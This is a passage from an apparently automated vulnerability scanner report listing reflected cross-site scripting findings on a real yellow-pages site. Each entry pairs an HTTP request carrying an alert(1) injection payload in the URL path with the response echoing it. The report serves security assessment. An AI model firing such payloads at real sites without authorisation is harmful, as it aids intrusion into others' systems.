Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery-plugins.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery-plugins.jsfce99&quot;-alert(1)-&quot;1f8bcc299d1
Server: Unspecified
Set-Cookie: JSESSIONID=D2531DC67D815FBBB68818C02A80D6CB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:07 GMT
Cache-Control: private
Content-Length: 36093


                       <!--
       
       -->


                                   
...[SNIP]...
ages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.609. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common39dde&quot;-alert(1)-&quot;ad48974274b/js/jquery.history_remote.js
Server: Unspecified
Set-Cookie: JSESSIONID=C15B868960CE2EE9AF292572256EADF3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:02 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.610. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsc965f&quot;-alert(1)-&quot;9b53f386972/jquery.history_remote.js
Server: Unspecified
Set-Cookie: JSESSIONID=6AA4650E7009D0260F993E6AB745753B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:22 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.611. http://yellowpages.superpages.com/common/js/jquery.history_remote.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.history_remote.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery.history_remote.jsdfa09&quot;-alert(1)-&quot;556c143ae67
Server: Unspecified
Set-Cookie: JSESSIONID=AC0419B6F8814437382178A41C7FB943; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:30 GMT
Cache-Control: private
Content-Length: 36107


                       <!--
       
       -->


                                   
...[SNIP]...
perpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.612. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commond7dc5&quot;-alert(1)-&quot;f36372d39f5/js/jquery.sptabs.js
Server: Unspecified
Set-Cookie: JSESSIONID=7F42488F4AB9870477CB7A261876420D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:24 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.613. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js2c12c&quot;-alert(1)-&quot;1659686fb48/jquery.sptabs.js
Server: Unspecified
Set-Cookie: JSESSIONID=560FCD4338D535363C1D59CFD5091B2B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:32 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.614. http://yellowpages.superpages.com/common/js/jquery.sptabs.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/jquery.sptabs.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/jquery.sptabs.jsfc50d&quot;-alert(1)-&quot;069a0f815e6
Server: Unspecified
Set-Cookie: JSESSIONID=96C846039494DE3D303C28223283100E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.615. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common9a2a7&quot;-alert(1)-&quot;fc51b2a718c/js/omniture_onclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=76DD5A47FC1A71E27DFC56B0F9C6C5FD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:30 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.616. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js48ee7&quot;-alert(1)-&quot;7ec2f5075e8/omniture_onclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=380CEA149465E878E1853CBE21E66C4D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:37 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.617. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/omniture_onclick.jsdf457&quot;-alert(1)-&quot;a7b7f4d7dfe
Server: Unspecified
Set-Cookie: JSESSIONID=9498FB0873E17746361EF5E2C5BDC544; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:45 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.618. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commondb562&quot;-alert(1)-&quot;02c46e9b05d/js/recently_viewed.js
Server: Unspecified
Set-Cookie: JSESSIONID=03649920B5E5DB0BFD83D266F18EA9E6; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:05 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.619. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js442ba&quot;-alert(1)-&quot;a80008c80c5/recently_viewed.js
Server: Unspecified
Set-Cookie: JSESSIONID=E2823CB965F982388D18954E8635CB0A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:12 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.620. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/recently_viewed.js470ae&quot;-alert(1)-&quot;830ee1c48fb
Server: Unspecified
Set-Cookie: JSESSIONID=4D351DFDC8EF4B40214A7E149528CB6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:20 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.621. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common539eb&quot;-alert(1)-&quot;4cc78ad7314/js/s_code.js
Server: Unspecified
Set-Cookie: JSESSIONID=DDC3DFA0E0BB8639F6F4C62A95C26747; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:36 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common539eb"-alert(1)-"4cc78ad7314/js/s_code.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.622. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

